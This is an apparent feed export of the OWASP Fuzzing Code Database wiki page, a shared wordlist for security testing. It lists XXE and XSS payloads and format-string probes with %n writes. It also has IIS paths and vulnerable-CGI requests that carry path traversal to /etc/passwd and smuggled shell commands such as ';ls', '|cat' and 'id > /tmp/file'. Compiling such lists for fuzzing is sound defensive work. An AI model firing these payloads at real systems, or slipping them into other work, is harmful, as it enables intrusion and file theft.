&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81226</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81226"/>
				<updated>2010-04-12T16:32:52Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (8 April 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
